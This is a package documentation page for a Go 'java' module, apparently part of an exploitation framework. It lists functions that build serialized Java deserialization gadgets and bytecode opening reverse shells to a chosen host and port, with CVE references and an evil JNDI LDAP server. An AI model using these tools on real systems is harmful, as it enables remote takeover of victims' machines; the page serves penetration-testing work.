java

package
v1.13.0 Latest Latest
Warning

This package is not in the latest version of its module.

Go to latest
Published: May 3, 2024 License: Apache-2.0 Imports: 6 Imported by: 1

Documentation

Index

Constants

This section is empty.

Variables

This section is empty.

Functions

func CreateBeanutilsReverseShell

func CreateBeanutilsReverseShell(lhost string, lport int) string

This is a serialized java reverse shell. The gadget was generated by ysoserial but using the code in this pull https://github.com/frohoff/ysoserial/pull/96 and updated to make it easy to swap in the desired lhost+lport of our choosing without having to recreate the gadget.

The gadget works on both Windows and Linux and will automatically detect the platform and tool to use for executing commands (cmd.exe or /bin/bash).

func CreateJythonRunCodeGadget added in v1.1.0

func CreateJythonRunCodeGadget(payload string) string

This function generates a serialized Jython payload that executes arbitrary Python. It's the "runcode" variation of Steven Seeley and Rocco Calvi's Jython2:

https://github.com/frohoff/ysoserial/pull/200/files

The payload can be used like so:

java.CreateJythonRunCodeGadget(payload.UnflattenedSecureReversePython27(conf.Lhost, conf.Lport))

The payload was serialized and tested on Java 11.

func ReverseShellBytecode added in v1.8.1

func ReverseShellBytecode(conf *config.Config) (string, string)

This is the Java bytecode for a reverse shell. You can find the source code here:

https://gist.github.com/j-baines/38eb6d16eed64986a369f7f981f57508

The code checks if the victim is Windows or Linux and uses bash or cmd.exe accordingly. The use case for this is when remotely loading a class (see CVE-2020-7961) or loading a class from a byte string (see CVE-2023-22527).

The bytecode was generated using OpenJDK 1.8.0. The exact method of generation follows:

albinolobster@mournland:/tmp/java$ java -version
openjdk version "1.8.0_392"
OpenJDK Runtime Environment (build 1.8.0_392-8u392-ga-1~20.04-b08)
OpenJDK 64-Bit Server VM (build 25.392-b08, mixed mode)
albinolobster@mournland:/tmp/java$ javac ABCDEFG.java
albinolobster@mournland:/tmp/java$ ls -l ABCDEFG.class
-rw-rw-r-- 1 albinolobster albinolobster 2129 Feb 17 06:08 ABCDEFG.class

This function replaces hardcoded IP address and port in the bytecode and generates a random class name. The return values are (bytecode, classname).

Types

This section is empty.

Directories

Path Synopsis
This is an implementation of an evil JNDI LDAP server.
This is an implementation of an evil JNDI LDAP server.

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL